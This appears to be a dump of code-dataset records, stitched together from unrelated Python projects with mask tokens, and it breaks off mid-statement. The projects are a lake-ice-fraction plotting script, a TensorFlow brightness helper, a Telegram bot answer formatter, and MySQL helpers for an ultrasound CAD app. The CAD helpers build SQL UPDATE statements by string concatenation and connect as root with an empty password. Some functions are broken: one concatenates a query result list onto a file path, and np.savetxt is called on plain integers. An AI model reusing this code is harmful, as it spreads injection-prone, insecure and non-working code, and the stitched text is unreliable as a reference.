"step-5": "from datetime import datetime\n\nimport xarray\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom matplotlib.dates import date2num\nimport numpy as np\nfrom matplotlib.gridspec import GridSpec\n\n\ndef test_plot_area_avg(target_nc_folder=\"\", source_nc_path=\"\"):\n\n # target_nc_folder = \"/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_1980-2009\"\n # target_nc_folder = \"/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_icefix_Obs_1980-1981_test\"\n\n #target_nc_folder = \"/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1980-1981_test1\"\n\n\n\n ice_fr = xarray.open_dataset(source_nc_path)[\"LC\"]\n\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n\n\n # t, x, y\n source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords[\"time\"]\n source_time = pd.to_datetime(source_time.values.tolist())\n\n s_source = pd.Series(data=[\n (field[~field.mask].mean() if not np.all(field.mask) else np.nan) for field in source_data\n ], index=source_time)\n\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + \"/*daily.nc\")[\"lake_ice_fraction\"]\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords[\"t\"].values.tolist())\n\n s_lkeff = pd.Series([\n (field[~field.mask].mean() if not np.all(field.mask) else np.nan) for field in lkeff_data\n ], index=lkeff_time)\n\n s_source = s_source[(s_source.index <= lkeff_time[-1]) & (s_source.index >= lkeff_time[0])]\n\n assert isinstance(s_source, pd.Series)\n\n #\n print(f\"Source: len={len(s_source)}\")\n print(f\"Lkeff: len={len(s_lkeff)}\")\n\n # do the plotting\n fig = plt.figure()\n gs = GridSpec(2, 1)\n # plot initial lake fractions\n ax = fig.add_subplot(gs[0, 0])\n s_source.plot(ax=ax, marker=\".\", linestyle=\"None\", label=\"original\")\n 
ax.legend()\n\n\n # plot lake fractions outputed by hles algorithm\n ax = fig.add_subplot(gs[1, 0], sharex=ax)\n s_lkeff.plot(ax=ax, marker=\".\", linestyle=\"None\", label=\"lkeff\")\n\n ax.legend()\n # plt.show()\n\n\ndef __print_field_stats(tfield, field, label):\n\n\n good_mask = ~field.mask\n\n if not np.any(good_mask):\n print(f\"{label}: no meaningful data\")\n return\n\n good_data = field[good_mask]\n print(f\"{label} {tfield}:\\n{good_data.min()}...{good_data.max()}\\n\"\n f\"mean={good_data.mean()}\\n\"\n f\"std={good_data.std()}\\n\")\n print(\"-\" * 20)\n\n\ndef test_plot_maps(target_nc_folder, source_nc_path=\"\"):\n\n # target_nc_folder = \"/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_1980-2009\"\n\n\n\n # target_nc_folder = \"/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1980-1981_test1\"\n\n ice_fr = xarray.open_dataset(source_nc_path)[\"LC\"]\n\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n\n\n start_date = datetime(1981, 1, 1)\n\n\n # t, x, y\n source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords[\"time\"]\n source_time = pd.to_datetime(source_time.values.tolist())\n\n\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + \"/*daily.nc\")[\"lake_ice_fraction\"]\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords[\"t\"].values.tolist())\n\n\n # select from lkeff data\n lkeff_time_sel = []\n lkeff_data_sel = []\n\n for t, afield in zip(lkeff_time, lkeff_data):\n if t < start_date:\n continue\n\n lkeff_time_sel.append(t)\n lkeff_data_sel.append(afield)\n\n lkeff_time = lkeff_time_sel\n lkeff_data = lkeff_data_sel\n\n\n\n # Select from the source time and data\n source_data_sel = []\n source_time_sel = []\n for t, afield in zip(source_time, source_data):\n\n if lkeff_time[0] <= t <= lkeff_time[-1]:\n 
source_data_sel.append(afield)\n source_time_sel.append(t)\n\n\n gs = GridSpec(1, 2)\n for i in range(len(source_time_sel)):\n\n ts = source_time_sel[i]\n tl = lkeff_time[i]\n\n data_s = source_data_sel[i]\n data_l = lkeff_data[i]\n\n fig = plt.figure(figsize=(20, 10))\n\n ax = fig.add_subplot(gs[0, 0])\n ax.set_title(f\"Source if: {ts}\")\n cs = ax.contourf(data_s, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n\n ax = fig.add_subplot(gs[0, 1])\n ax.set_title(f\"Lkeff if: {tl}\")\n cs = ax.contourf(data_l, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n\n print(\"*\" * 20)\n __print_field_stats(ts, data_s, \"source\")\n __print_field_stats(tl, data_l, \"lkeff\")\n print(\"*\" * 20)\n\n\n\n ms = data_s[~data_s.mask].mean()\n ml = data_l[~data_l.mask].mean()\n if ms != ml:\n print(f\"ms={ms}; ml={ml}\")\n plt.show()\n\n plt.close(fig)\n\n\n\n\n\n\ndef main():\n target_nc_folder = \"/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1proc_1980-1981\"\n # source_nc_path = \"/HOME/huziy/skynet3_rech1/obs_data_for_HLES/interploated_to_the_same_grid/GL_0.1_452x260/cis_nic_glerl_interpolated_lc.nc\"\n source_nc_path = \"/HOME/huziy/skynet3_rech1/obs_data_for_HLES/interploated_to_the_same_grid/GL_0.1_452x260_icefix/cis_nic_glerl_interpolated_lc_fix.nc\"\n\n test_plot_area_avg(target_nc_folder=target_nc_folder, source_nc_path=source_nc_path)\n # test_plot_maps(target_nc_folder=target_nc_folder, source_nc_path=source_nc_path)\n plt.show()\n\n\n\nif __name__ == '__main__':\n main()",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
#!/usr/bin/env python3
""" brightness an image"""
import tensorflow as tf
def change_brightness(image, max_delta):
"""brightness an image"""
img = tf.image.adjust_brightness(image, max_delta)
return img
|
normal
|
{
"blob_id": "07e068dbc1ba1bcb85121ee49f2f9337cae188ba",
"index": 9388,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef change_brightness(image, max_delta):\n \"\"\"brightness an image\"\"\"\n img = tf.image.adjust_brightness(image, max_delta)\n return img\n",
"step-3": "<mask token>\nimport tensorflow as tf\n\n\ndef change_brightness(image, max_delta):\n \"\"\"brightness an image\"\"\"\n img = tf.image.adjust_brightness(image, max_delta)\n return img\n",
"step-4": "#!/usr/bin/env python3\n\"\"\" brightness an image\"\"\"\nimport tensorflow as tf\n\n\ndef change_brightness(image, max_delta):\n \"\"\"brightness an image\"\"\"\n img = tf.image.adjust_brightness(image, max_delta)\n return img\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def send_answer(question_id, answer_owner, receiver_tel_id, short):
answer = cur.execute(
'SELECT answer FROM Answers WHERE question_id = (%s) AND tel_id = (%s)'
, (question_id, answer_owner)).fetchone()
keyboard = telebot.types.InlineKeyboardMarkup()
if answer is not None:
(id, question_id, tel_id, answer, accepted_answer, rate_answer,
photo, document, document_type, document_size, send_date) = (cur
.execute(
'SELECT * FROM Answers WHERE question_id = (%s) AND tel_id = (%s)',
(question_id, answer_owner)).fetchone())
question_owner = cur.execute(
'SELECT tel_id FROM Questions WHERE id = (%s)', (question_id,)
).fetchone()[0]
role = cur.execute('SELECT role FROM Users WHERE tel_id = (%s)', (
answer_owner,)).fetchone()[0]
short_message_flag = False
if limit_text(answer):
short_message_flag = True
if short:
answer = limit_text(answer)
showkey = showmore
else:
showkey = showless
if receiver_tel_id == question_owner:
if accepted_answer:
keyboard.add(showkey)
else:
keyboard.add(showkey, accept_answer, next_page_answer)
else:
keyboard.add(showkey)
elif receiver_tel_id == question_owner:
if not accepted_answer:
if question_owner == receiver_tel_id:
keyboard.add(accept_answer, next_page_answer)
if photo is not None:
keyboard.add(photo_button)
if document is not None:
document_button = telebot.types.InlineKeyboardButton(emoji.
emojize(':paperclip: {0} ({1})'.format(document_type,
document_size)), callback_data='document')
keyboard.add(document_button)
if role in ['STUDENT', 'TA']:
if accepted_answer:
answer = emoji.emojize(':white_heavy_check_mark: #A_') + str(
question_id) + ' #' + str(answer_owner
) + '\n\n' + answer + emoji.emojize(
"""
:high_voltage: Rated: {0}/5""".format(rate_answer))
else:
answer = emoji.emojize(':bright_button: #A_') + str(question_id
) + ' #' + str(answer_owner) + '\n\n' + answer
if role == 'TA':
answer += emoji.emojize('\n\n:bust_in_silhouette: Sent by '
) + role
elif role in ['ADMIN']:
question_state = cur.execute(
'SELECT status FROM Questions WHERE id = (%s)', (question_id,)
).fetchone()[0]
keyboard = telebot.types.InlineKeyboardMarkup()
if short_message_flag:
if short:
showkey = showmore
else:
showkey = showless
keyboard.add(showkey)
else:
keyboard = None
if photo is not None:
keyboard.add(photo_button)
if document is not None:
document_button = telebot.types.InlineKeyboardButton(emoji.
emojize(':paperclip: {0} ({1})'.format(document_type,
document_size)), callback_data='document')
keyboard.add(document_button)
answer = emoji.emojize(':collision: #A_') + str(question_id
) + ' #' + str(answer_owner) + '\n\n' + answer + emoji.emojize(
"""
:bust_in_silhouette: Sent by """) + role
return answer, keyboard
<|reserved_special_token_1|>
from keyboards import *
from DB import cur, conn
from bot_token import bot
from limit_text import limit_text
def send_answer(question_id, answer_owner, receiver_tel_id, short):
answer = cur.execute(
'SELECT answer FROM Answers WHERE question_id = (%s) AND tel_id = (%s)'
, (question_id, answer_owner)).fetchone()
keyboard = telebot.types.InlineKeyboardMarkup()
if answer is not None:
(id, question_id, tel_id, answer, accepted_answer, rate_answer,
photo, document, document_type, document_size, send_date) = (cur
.execute(
'SELECT * FROM Answers WHERE question_id = (%s) AND tel_id = (%s)',
(question_id, answer_owner)).fetchone())
question_owner = cur.execute(
'SELECT tel_id FROM Questions WHERE id = (%s)', (question_id,)
).fetchone()[0]
role = cur.execute('SELECT role FROM Users WHERE tel_id = (%s)', (
answer_owner,)).fetchone()[0]
short_message_flag = False
if limit_text(answer):
short_message_flag = True
if short:
answer = limit_text(answer)
showkey = showmore
else:
showkey = showless
if receiver_tel_id == question_owner:
if accepted_answer:
keyboard.add(showkey)
else:
keyboard.add(showkey, accept_answer, next_page_answer)
else:
keyboard.add(showkey)
elif receiver_tel_id == question_owner:
if not accepted_answer:
if question_owner == receiver_tel_id:
keyboard.add(accept_answer, next_page_answer)
if photo is not None:
keyboard.add(photo_button)
if document is not None:
document_button = telebot.types.InlineKeyboardButton(emoji.
emojize(':paperclip: {0} ({1})'.format(document_type,
document_size)), callback_data='document')
keyboard.add(document_button)
if role in ['STUDENT', 'TA']:
if accepted_answer:
answer = emoji.emojize(':white_heavy_check_mark: #A_') + str(
question_id) + ' #' + str(answer_owner
) + '\n\n' + answer + emoji.emojize(
"""
:high_voltage: Rated: {0}/5""".format(rate_answer))
else:
answer = emoji.emojize(':bright_button: #A_') + str(question_id
) + ' #' + str(answer_owner) + '\n\n' + answer
if role == 'TA':
answer += emoji.emojize('\n\n:bust_in_silhouette: Sent by '
) + role
elif role in ['ADMIN']:
question_state = cur.execute(
'SELECT status FROM Questions WHERE id = (%s)', (question_id,)
).fetchone()[0]
keyboard = telebot.types.InlineKeyboardMarkup()
if short_message_flag:
if short:
showkey = showmore
else:
showkey = showless
keyboard.add(showkey)
else:
keyboard = None
if photo is not None:
keyboard.add(photo_button)
if document is not None:
document_button = telebot.types.InlineKeyboardButton(emoji.
emojize(':paperclip: {0} ({1})'.format(document_type,
document_size)), callback_data='document')
keyboard.add(document_button)
answer = emoji.emojize(':collision: #A_') + str(question_id
) + ' #' + str(answer_owner) + '\n\n' + answer + emoji.emojize(
"""
:bust_in_silhouette: Sent by """) + role
return answer, keyboard
<|reserved_special_token_1|>
from keyboards import *
from DB import cur, conn
from bot_token import bot
from limit_text import limit_text
def send_answer(question_id, answer_owner, receiver_tel_id, short):
answer = cur.execute('''SELECT answer FROM Answers WHERE question_id = (%s) AND tel_id = (%s)''', (question_id, answer_owner)).fetchone()
keyboard = telebot.types.InlineKeyboardMarkup()
if answer is not None:
id, question_id, tel_id, answer, accepted_answer, rate_answer, photo, document, document_type, document_size, send_date = cur.execute(
'''SELECT * FROM Answers WHERE question_id = (%s) AND tel_id = (%s)''',
(question_id, answer_owner)).fetchone()
question_owner = \
cur.execute('''SELECT tel_id FROM Questions WHERE id = (%s)''', (question_id, )).fetchone()[0]
# Limiting Long Questions and specifying keyboard accordingly
# GETTING ADMINS AND TAs
role = cur.execute('''SELECT role FROM Users WHERE tel_id = (%s)''', (answer_owner, )).fetchone()[0]
# This flag is used at the bottom for Admin and TAs keyboard setting
short_message_flag = False
# Setting keyboard
if limit_text(answer):
short_message_flag = True
# SHOWMORE key
if short:
answer = limit_text(answer)
showkey = showmore
else:
showkey = showless
if receiver_tel_id == question_owner:
if accepted_answer:
keyboard.add(showkey)
else:
keyboard.add(showkey, accept_answer, next_page_answer)
else:
# FOLLOWERs and Answer Owner only get a show more key
keyboard.add(showkey)
else:
if receiver_tel_id == question_owner:
if not accepted_answer:
if question_owner == receiver_tel_id:
keyboard.add(accept_answer, next_page_answer)
# ATTACHMENTs
if photo is not None:
keyboard.add(photo_button)
if document is not None:
document_button = telebot.types.InlineKeyboardButton(emoji.emojize(':paperclip: {0} ({1})'
.format(document_type, document_size)), callback_data='document')
keyboard.add(document_button)
# SETTING EMOJI BASED ON ACCEPTED OR NOT ACCEPTED ANSWER
if role in ['STUDENT', 'TA']:
if accepted_answer:
answer = emoji.emojize(':white_heavy_check_mark: #A_') + str(question_id) + ' #' + \
str(answer_owner) + '\n\n' + answer + emoji.emojize('\n\n:high_voltage: Rated: {0}/5'.format(rate_answer))
else:
answer = emoji.emojize(':bright_button: #A_') + str(question_id) + ' #' + str(answer_owner) + '\n\n' + answer
if role == 'TA':
answer += emoji.emojize('\n\n:bust_in_silhouette: Sent by ') + role
## ADMINs AND TAs answers are indicated with a flag
elif role in ['ADMIN']:
question_state = cur.execute('''SELECT status FROM Questions WHERE id = (%s)''', (question_id,)).fetchone()[0]
# ADMIN Answers are different
keyboard = telebot.types.InlineKeyboardMarkup()
if short_message_flag:
# SHOWMORE key
if short:
showkey = showmore
else:
showkey = showless
keyboard.add(showkey)
else:
keyboard = None
# ATTACHMENTs
if photo is not None:
keyboard.add(photo_button)
if document is not None:
document_button = telebot.types.InlineKeyboardButton(emoji.emojize(':paperclip: {0} ({1})'.format(document_type,
document_size)), callback_data='document')
keyboard.add(document_button)
answer = emoji.emojize(':collision: #A_') + str(question_id) + ' #' + str(answer_owner) + '\n\n' \
+ answer + emoji.emojize('\n\n:bust_in_silhouette: Sent by ') + role
# Returning Answer and Two Keyboards
return (answer, keyboard)
|
flexible
|
{
"blob_id": "464fc2c193769eee86a639f73b933d5413be2b87",
"index": 3396,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef send_answer(question_id, answer_owner, receiver_tel_id, short):\n answer = cur.execute(\n 'SELECT answer FROM Answers WHERE question_id = (%s) AND tel_id = (%s)'\n , (question_id, answer_owner)).fetchone()\n keyboard = telebot.types.InlineKeyboardMarkup()\n if answer is not None:\n (id, question_id, tel_id, answer, accepted_answer, rate_answer,\n photo, document, document_type, document_size, send_date) = (cur\n .execute(\n 'SELECT * FROM Answers WHERE question_id = (%s) AND tel_id = (%s)',\n (question_id, answer_owner)).fetchone())\n question_owner = cur.execute(\n 'SELECT tel_id FROM Questions WHERE id = (%s)', (question_id,)\n ).fetchone()[0]\n role = cur.execute('SELECT role FROM Users WHERE tel_id = (%s)', (\n answer_owner,)).fetchone()[0]\n short_message_flag = False\n if limit_text(answer):\n short_message_flag = True\n if short:\n answer = limit_text(answer)\n showkey = showmore\n else:\n showkey = showless\n if receiver_tel_id == question_owner:\n if accepted_answer:\n keyboard.add(showkey)\n else:\n keyboard.add(showkey, accept_answer, next_page_answer)\n else:\n keyboard.add(showkey)\n elif receiver_tel_id == question_owner:\n if not accepted_answer:\n if question_owner == receiver_tel_id:\n keyboard.add(accept_answer, next_page_answer)\n if photo is not None:\n keyboard.add(photo_button)\n if document is not None:\n document_button = telebot.types.InlineKeyboardButton(emoji.\n emojize(':paperclip: {0} ({1})'.format(document_type,\n document_size)), callback_data='document')\n keyboard.add(document_button)\n if role in ['STUDENT', 'TA']:\n if accepted_answer:\n answer = emoji.emojize(':white_heavy_check_mark: #A_') + str(\n question_id) + ' #' + str(answer_owner\n ) + '\\n\\n' + answer + emoji.emojize(\n \"\"\"\n\n:high_voltage: Rated: {0}/5\"\"\".format(rate_answer))\n else:\n answer = emoji.emojize(':bright_button: #A_') + str(question_id\n ) + ' #' + str(answer_owner) + '\\n\\n' + answer\n if role == 'TA':\n answer += 
emoji.emojize('\\n\\n:bust_in_silhouette: Sent by '\n ) + role\n elif role in ['ADMIN']:\n question_state = cur.execute(\n 'SELECT status FROM Questions WHERE id = (%s)', (question_id,)\n ).fetchone()[0]\n keyboard = telebot.types.InlineKeyboardMarkup()\n if short_message_flag:\n if short:\n showkey = showmore\n else:\n showkey = showless\n keyboard.add(showkey)\n else:\n keyboard = None\n if photo is not None:\n keyboard.add(photo_button)\n if document is not None:\n document_button = telebot.types.InlineKeyboardButton(emoji.\n emojize(':paperclip: {0} ({1})'.format(document_type,\n document_size)), callback_data='document')\n keyboard.add(document_button)\n answer = emoji.emojize(':collision: #A_') + str(question_id\n ) + ' #' + str(answer_owner) + '\\n\\n' + answer + emoji.emojize(\n \"\"\"\n\n:bust_in_silhouette: Sent by \"\"\") + role\n return answer, keyboard\n",
"step-3": "from keyboards import *\nfrom DB import cur, conn\nfrom bot_token import bot\nfrom limit_text import limit_text\n\n\ndef send_answer(question_id, answer_owner, receiver_tel_id, short):\n answer = cur.execute(\n 'SELECT answer FROM Answers WHERE question_id = (%s) AND tel_id = (%s)'\n , (question_id, answer_owner)).fetchone()\n keyboard = telebot.types.InlineKeyboardMarkup()\n if answer is not None:\n (id, question_id, tel_id, answer, accepted_answer, rate_answer,\n photo, document, document_type, document_size, send_date) = (cur\n .execute(\n 'SELECT * FROM Answers WHERE question_id = (%s) AND tel_id = (%s)',\n (question_id, answer_owner)).fetchone())\n question_owner = cur.execute(\n 'SELECT tel_id FROM Questions WHERE id = (%s)', (question_id,)\n ).fetchone()[0]\n role = cur.execute('SELECT role FROM Users WHERE tel_id = (%s)', (\n answer_owner,)).fetchone()[0]\n short_message_flag = False\n if limit_text(answer):\n short_message_flag = True\n if short:\n answer = limit_text(answer)\n showkey = showmore\n else:\n showkey = showless\n if receiver_tel_id == question_owner:\n if accepted_answer:\n keyboard.add(showkey)\n else:\n keyboard.add(showkey, accept_answer, next_page_answer)\n else:\n keyboard.add(showkey)\n elif receiver_tel_id == question_owner:\n if not accepted_answer:\n if question_owner == receiver_tel_id:\n keyboard.add(accept_answer, next_page_answer)\n if photo is not None:\n keyboard.add(photo_button)\n if document is not None:\n document_button = telebot.types.InlineKeyboardButton(emoji.\n emojize(':paperclip: {0} ({1})'.format(document_type,\n document_size)), callback_data='document')\n keyboard.add(document_button)\n if role in ['STUDENT', 'TA']:\n if accepted_answer:\n answer = emoji.emojize(':white_heavy_check_mark: #A_') + str(\n question_id) + ' #' + str(answer_owner\n ) + '\\n\\n' + answer + emoji.emojize(\n \"\"\"\n\n:high_voltage: Rated: {0}/5\"\"\".format(rate_answer))\n else:\n answer = emoji.emojize(':bright_button: #A_') + 
str(question_id\n ) + ' #' + str(answer_owner) + '\\n\\n' + answer\n if role == 'TA':\n answer += emoji.emojize('\\n\\n:bust_in_silhouette: Sent by '\n ) + role\n elif role in ['ADMIN']:\n question_state = cur.execute(\n 'SELECT status FROM Questions WHERE id = (%s)', (question_id,)\n ).fetchone()[0]\n keyboard = telebot.types.InlineKeyboardMarkup()\n if short_message_flag:\n if short:\n showkey = showmore\n else:\n showkey = showless\n keyboard.add(showkey)\n else:\n keyboard = None\n if photo is not None:\n keyboard.add(photo_button)\n if document is not None:\n document_button = telebot.types.InlineKeyboardButton(emoji.\n emojize(':paperclip: {0} ({1})'.format(document_type,\n document_size)), callback_data='document')\n keyboard.add(document_button)\n answer = emoji.emojize(':collision: #A_') + str(question_id\n ) + ' #' + str(answer_owner) + '\\n\\n' + answer + emoji.emojize(\n \"\"\"\n\n:bust_in_silhouette: Sent by \"\"\") + role\n return answer, keyboard\n",
"step-4": "from keyboards import *\nfrom DB import cur, conn\nfrom bot_token import bot\nfrom limit_text import limit_text\n\ndef send_answer(question_id, answer_owner, receiver_tel_id, short):\n\n answer = cur.execute('''SELECT answer FROM Answers WHERE question_id = (%s) AND tel_id = (%s)''', (question_id, answer_owner)).fetchone()\n keyboard = telebot.types.InlineKeyboardMarkup()\n\n if answer is not None:\n id, question_id, tel_id, answer, accepted_answer, rate_answer, photo, document, document_type, document_size, send_date = cur.execute(\n '''SELECT * FROM Answers WHERE question_id = (%s) AND tel_id = (%s)''',\n (question_id, answer_owner)).fetchone()\n\n question_owner = \\\n cur.execute('''SELECT tel_id FROM Questions WHERE id = (%s)''', (question_id, )).fetchone()[0]\n # Limiting Long Questions and specifying keyboard accordingly\n\n # GETTING ADMINS AND TAs\n role = cur.execute('''SELECT role FROM Users WHERE tel_id = (%s)''', (answer_owner, )).fetchone()[0]\n\n # This flag is used at the bottom for Admin and TAs keyboard setting\n short_message_flag = False\n # Setting keyboard\n if limit_text(answer):\n short_message_flag = True\n # SHOWMORE key\n if short:\n answer = limit_text(answer)\n showkey = showmore\n else:\n showkey = showless\n\n if receiver_tel_id == question_owner:\n if accepted_answer:\n keyboard.add(showkey)\n else:\n keyboard.add(showkey, accept_answer, next_page_answer)\n else:\n # FOLLOWERs and Answer Owner only get a show more key\n keyboard.add(showkey)\n else:\n if receiver_tel_id == question_owner:\n if not accepted_answer:\n if question_owner == receiver_tel_id:\n keyboard.add(accept_answer, next_page_answer)\n\n # ATTACHMENTs\n if photo is not None:\n keyboard.add(photo_button)\n if document is not None:\n document_button = telebot.types.InlineKeyboardButton(emoji.emojize(':paperclip: {0} ({1})'\n .format(document_type, document_size)), callback_data='document')\n keyboard.add(document_button)\n\n # SETTING EMOJI BASED ON ACCEPTED 
OR NOT ACCEPTED ANSWER\n if role in ['STUDENT', 'TA']:\n if accepted_answer:\n answer = emoji.emojize(':white_heavy_check_mark: #A_') + str(question_id) + ' #' + \\\n str(answer_owner) + '\\n\\n' + answer + emoji.emojize('\\n\\n:high_voltage: Rated: {0}/5'.format(rate_answer))\n\n else:\n answer = emoji.emojize(':bright_button: #A_') + str(question_id) + ' #' + str(answer_owner) + '\\n\\n' + answer\n\n if role == 'TA':\n answer += emoji.emojize('\\n\\n:bust_in_silhouette: Sent by ') + role\n\n ## ADMINs AND TAs answers are indicated with a flag\n elif role in ['ADMIN']:\n question_state = cur.execute('''SELECT status FROM Questions WHERE id = (%s)''', (question_id,)).fetchone()[0]\n\n # ADMIN Answers are different\n keyboard = telebot.types.InlineKeyboardMarkup()\n if short_message_flag:\n # SHOWMORE key\n if short:\n showkey = showmore\n else:\n showkey = showless\n\n keyboard.add(showkey)\n else:\n keyboard = None\n\n # ATTACHMENTs\n if photo is not None:\n keyboard.add(photo_button)\n if document is not None:\n document_button = telebot.types.InlineKeyboardButton(emoji.emojize(':paperclip: {0} ({1})'.format(document_type,\n document_size)), callback_data='document')\n keyboard.add(document_button)\n\n answer = emoji.emojize(':collision: #A_') + str(question_id) + ' #' + str(answer_owner) + '\\n\\n' \\\n + answer + emoji.emojize('\\n\\n:bust_in_silhouette: Sent by ') + role\n\n # Returning Answer and Two Keyboards\n return (answer, keyboard)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def getFiturEkstraksi():
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor.execute(sql_select_Query)
fiturname = cursor.fetchall()
fitur = np.genfromtxt(
'C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/' +
fiturname, delimiter=',')
if connection.is_connected():
cursor.close()
connection.close()
return fitur
def saveFiturEkstraksi(fitur, label):
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
fiturname = 'fitur.txt'
rowfitur = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +
fiturname, 'w')
for row in range(len(fitur)):
np.savetxt(rowfitur, row)
rowfitur.close()
labelname = 'label.txt'
rowlabel = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +
labelname, 'w')
for row in range(len(label)):
np.savetxt(rowlabel, row)
rowlabel.close()
sql_update = ("UPDATE fitur_ekstraksis SET fitur = '" + fiturname +
"', label = '" + labelname + "' WHERE id = 1")
cursor.execute(sql_update)
connection.commit()
if connection.is_connected():
cursor.close()
connection.close()
return print('sukses')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def saveData(data, label, filename):
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
filename_hasil = 'hasilproses_' + filename
with open(
'C:\\xampp\\htdocs\\projectCAD\\public\\storage\\upload/files\\hasilproses/'
+ filename_hasil, 'w') as f:
for row in data:
f.write(str(row) + '\n')
f.close()
sql_select = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor.execute(sql_select)
records = cursor.fetchall()
data = records[0]
id_pasien = data[0]
print(label[0])
sql_update = ("UPDATE pasien SET hasilproses = '" + filename_hasil +
"',label = '" + str(label[0]) + "' WHERE id = " + str(id_pasien))
cursor.execute(sql_update)
connection.commit()
if connection.is_connected():
cursor.close()
connection.close()
return print('sukses')
def getFiturEkstraksi():
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor.execute(sql_select_Query)
fiturname = cursor.fetchall()
fitur = np.genfromtxt(
'C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/' +
fiturname, delimiter=',')
if connection.is_connected():
cursor.close()
connection.close()
return fitur
def saveFiturEkstraksi(fitur, label):
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
fiturname = 'fitur.txt'
rowfitur = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +
fiturname, 'w')
for row in range(len(fitur)):
np.savetxt(rowfitur, row)
rowfitur.close()
labelname = 'label.txt'
rowlabel = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +
labelname, 'w')
for row in range(len(label)):
np.savetxt(rowlabel, row)
rowlabel.close()
sql_update = ("UPDATE fitur_ekstraksis SET fitur = '" + fiturname +
"', label = '" + labelname + "' WHERE id = 1")
cursor.execute(sql_update)
connection.commit()
if connection.is_connected():
cursor.close()
connection.close()
return print('sukses')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def readData():
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor = connection.cursor()
cursor.execute(sql_select_Query)
records = cursor.fetchall()
data = records[0]
filename = data[2]
dataSignal = []
my_file = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/files/dokter/' +
filename, 'r')
for line in my_file.readlines():
if line[-1:] == '\n':
dataSignal.append(line[:-1])
else:
dataSignal.append(line)
my_file.close()
if connection.is_connected():
cursor.close()
connection.close()
return dataSignal, filename
def saveData(data, label, filename):
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
filename_hasil = 'hasilproses_' + filename
with open(
'C:\\xampp\\htdocs\\projectCAD\\public\\storage\\upload/files\\hasilproses/'
+ filename_hasil, 'w') as f:
for row in data:
f.write(str(row) + '\n')
f.close()
sql_select = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor.execute(sql_select)
records = cursor.fetchall()
data = records[0]
id_pasien = data[0]
print(label[0])
sql_update = ("UPDATE pasien SET hasilproses = '" + filename_hasil +
"',label = '" + str(label[0]) + "' WHERE id = " + str(id_pasien))
cursor.execute(sql_update)
connection.commit()
if connection.is_connected():
cursor.close()
connection.close()
return print('sukses')
def getFiturEkstraksi():
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor.execute(sql_select_Query)
fiturname = cursor.fetchall()
fitur = np.genfromtxt(
'C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/' +
fiturname, delimiter=',')
if connection.is_connected():
cursor.close()
connection.close()
return fitur
def saveFiturEkstraksi(fitur, label):
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
fiturname = 'fitur.txt'
rowfitur = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +
fiturname, 'w')
for row in range(len(fitur)):
np.savetxt(rowfitur, row)
rowfitur.close()
labelname = 'label.txt'
rowlabel = open(
